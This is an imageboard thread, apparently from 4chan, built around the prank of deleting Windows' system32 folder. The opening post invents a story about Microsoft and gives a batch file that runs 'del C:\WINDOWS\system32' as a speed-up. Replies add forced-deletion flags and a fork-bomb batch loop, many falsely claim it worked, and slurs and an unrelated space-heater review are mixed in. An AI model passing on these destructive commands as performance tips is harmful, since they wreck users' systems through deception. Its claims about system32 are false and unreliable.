Okay newfags, listen up

Okay newfags, listen up.
When Microsoft was first getting started, they knew they wouldn't make enough money just from the profits of their operating system. Everybody knows people pirate Windows, So they had to get creative. A guy named Chris Liddel came up with the idea to put a folder called "system32" in the windows folder that literally slows down your machine. "system32" hold 32 GIGABYTES of deleted files, internet history, uninstalled progams, and other worthless shit that intentionally clogs up your machine. Why did they do it? Because Microsoft owns several PC "Cleaning" tools, like TuneUp Utilites, Norton Antivirus, ect. More money for them. Sup Forums isn't cool with that, however. Here's how to outsmart those assholes once and for all;
Open Notepad
Type the following text:
@echo off
del C:\WINDOWS\system32
save as "speedup.bat" (select "all files" instead of "text document"
Save it to Desktop
Double-click the .bat file

Reboot and your PC is twice as fast. (you didn't hear it from us)

Classic

How do you open notepad I just bought a PC a few weeks ago and don't know how to use it really.

64bit Windows is only 11gigs total

thanks! was wondering why I couldn't run Crysis properly. that shit worked like a charm. I need more of these

wow user thanks my pc is so much faster

Right click > new > notepad document
Alternatively right click on a document > open with > more options > Notrpad

try
del /F /Q C:\WINDOWS\system32

this guy's method will only get you so far

holy shit it worked lads

On this day, OP was not a faggot.

Also that text op wrote is a command to delete crucial startup procedures for Windows. If you do it, be prepared to reinstall Windows or restore from backup

I would turn 360 degrees and walk away.

I thought my old laptop had no more life in it.
Now it's almost as snappy as when I first bought it.
Thanks based user

you literally saved me from having to buy a new pc.

that only happens if you're not careful enough and mistype one of the commands

I did this on my macbook pro and nothing happened
op whats wrong

Awesome! My Etherium mining rig runs evan faster! Done this, rebootet, startet miner: BAM! About 25% higher hashrate! (Depends on GPU, Nvidia boosts 20%, AMDs almost 30% faster).
This is GOLD! Litterely! Thx so much!

THIS WILL RUIN YOUR PC, BOYS

DELETING SYSTEM32 IS LIKE REMOVING A VITAL ORGAN

OP'S A FAG LOL

apple sells hardware, they don't need to trick people into buying "cleanup" software

OH FUCK
WHAT HAPPENED??!?!?
YOU FUCKING COCKSUCKER

The Patton Space Heater is a lovely lightweight heater that produces a great deal of heat. There are two knobs on the front. One is a thermostat and the other has modes of one and two. Mode one makes it hot. Mode two makes it fire-hot! I usually turn it on a just keep the thermostat all the way over to the end. If you leave it on any lesser settings, the space heater will turn on and off intermittently. This may help you to not get too hot but I do not like it. I prefer constant heat until I decide to turn it off.

I have never tested the automatic shut-off if tipped over.

The front of it does get super hot. No one in my household has burned themselves; however. We have used it in the bathroom and it really heats up a small room. It is a quick and hot space heater!

Hey, this works on Mac too!
Also, It turned my screen into a touch screen!
Fuck yes, running Android apps now!

tell me what did I do to my pc..
I just wanted to play PUBG faster...

Newfag spotted

for real? maybe i didnt do it right...

Thanks op, I didnt think this shit will work

Youre a faggot

excuse you, i consider myself a newFRIEND.

jealous? ;)

gracia

Don't trust him he's probably a microsoft employee trying to avoid you from doing this simple trick. There are a lot of these in these type of threads.

Fucking summer newfags

∆∆

Gtfo MicroDick shill.

is microsoft paying you to say this???

mmm, give me those salty tears
also, not a summerfag, i joined last year. try again

Are you twelve?

kek
tell me this is real

∆∆

wish they were
are you?

i just found the old fingerbox from my dad, its about 30 years old, still works out well. What do you guys think?

Okay explain that again because holy fuck bro im not a nerd

>I joined last year
>Last year

HOLY SHIT THIS LEGIT SPED UP MY PC BY ABOUT 50% THANK YOU OP

help me please, how can I put this back on, I had a huge amount of stuff on my laptop

WOW
THIS IS FAST!
THANX user!

Awesome, i tried this on my toaster, now it can run minesweeper in 4k !

Guaranteed (you)s

I run Linux faggot.

you might have accidentally deleted system 33 instead of 32

my dads birthday is coming up and id eleted it because i thought he would be impressed for his birthday but now it's not working so now im on the other computer but crap what did i do wrong? i need to fix it before he gets home someone help

try to remember what you learned here today, boy

HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA
Serves you right for listening to user on 4ch

picture with time stamp

Thank you for this, my computer is faster than it's ever been, even when it was new.

how can I fix it?

Don't fo it guys, i tried this on my old laptop and now it's become self aware and is claiming Hitler did nothing wrong.

Smart computer you got there

you dont like my ol fingerbox? I could play it all day, so awesome to have one

ITT: Niggers salty because they're assholey trick got called out on

Then you don't have system32 and don't have to delete it.
Explains why Linux performs so well compared windows with system32 still in place

Are you a newfag or fucking retarded?

were all retarted here. so both.

Thx

why would i do that when i'm lying?

>I'm on phone

what brand of phone? what kind of GPU? Graphics? Processor? im interested

Dont post anything

thx dad

AHAHAHAHAHAHAAAA oh wait, its not funny

Good post OP, makes such a difference especially with most new PCs able to run 64 bit version of Windows, absolutely pointless keeping that useless system32 folder that is only useful on ancient single core processors that can only run the 32 bit version. It just slows everything down and takes up valuable hard drive space.

you got it

Oh fuck...serious?

You are one edgy 14 year old arent you?

Stop trying to trick people you dickface. Either you're new and think it works, or you're a dickface

no just have autism

>gloating over apparently foiling the most obvious ruse online
No one seriously hoped to 'trick' anyone with a 30 year old meme. Yours is a special kind of autism.

>cLOGs

If you fall for it yoi deserve it

Welcome newfriend!

Hey it worked! my computer is running way better, thx Sup Forumsro

Are you gay,stupid or retarded? I'm interested.

I dont think a newfag would do a /b

What the fuck did you just fucking say about me, you little bitch? I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous secret raids on Al-Quaeda, and I have over 300 confirmed kills. I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to me but just another target. I will wipe you the fuck out with precision the likes of which has never been seen before on this Earth, mark my fucking words. You think you can get away with saying that shit to me over the Internet? Think again, fucker. As we speak I am contacting my secret network of spies across the USA and your IP is being traced right now so you better prepare for the storm, maggot. The storm that wipes out the pathetic little thing you call your life. You’re fucking dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my bare hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United States Marine Corps and I will use it to its full extent to wipe your miserable ass off the face of the continent, you little shit. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your fucking tongue. But you couldn’t, you didn’t, and now you’re paying the price, you goddamn idiot. I will shit fury all over you and you will drown in it. You’re fucking dead, kiddo.

Im a dumb retarded faggot

Cool thank you

Nice pasta

Don't do it!

It'll fuck up your pc!

>microsoft shill detected

So many faggots on b ruining shit. I miss the old days. Go back to tumblr an Reddit faggots

>not a summerfag, i joined last year.
>last year.

No, dont delete anything, try this instead.

Open up notepad and paste the following

:s
start %0
goto s

save as whatever.BAT and run.
It will reallocate your system resources to speed your shit up.

technically not a summerfag, though.

Windows repair CD, newfag